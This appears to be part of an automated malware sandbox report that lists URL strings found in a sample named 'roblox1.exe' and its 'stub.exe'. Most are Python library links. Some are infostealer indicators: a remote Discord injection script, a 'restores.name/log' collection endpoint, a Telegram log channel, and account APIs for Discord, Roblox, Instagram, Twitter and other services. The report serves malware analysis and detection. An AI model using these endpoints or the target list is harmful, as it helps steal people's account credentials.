                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/guilds/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://discord.com/api/v8/guilds/u/invitesainvitesuhttps://discord.gg/acodeuhttps://t.me/TaroCloudF
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-config
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-configT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
                  Source: stub.exe, 00000003.00000002.1949463983.00000213BF514000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
                  Source: stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek).
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://gql.twitch.tv/gqlT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hynek.me/articles/import-attrs/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=trueuhttps://i.instagram.com/api/v1/users
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klaviyo.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547712572.00007FF7D065C000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://nuitka.net/info/segfault.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/meuNo
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://open.spotify.com/user/u
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0649/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/attrs/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforMonster/injection/main/injection.js
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforMonster/injection/main/injection.jsanulluMain.GetInjectionC
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://restores.name/log
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://restores.name/logaYWC7WVTV3UDR8DUg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
                  Source: stub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1949761469.00000213BF5A0000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/TaroCloudFreelogs
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEC8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1943034035.00000213BDE98000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/TaroCloudFreelogs----------------------
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonareqadescriptionuThere
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://twitter.com/u
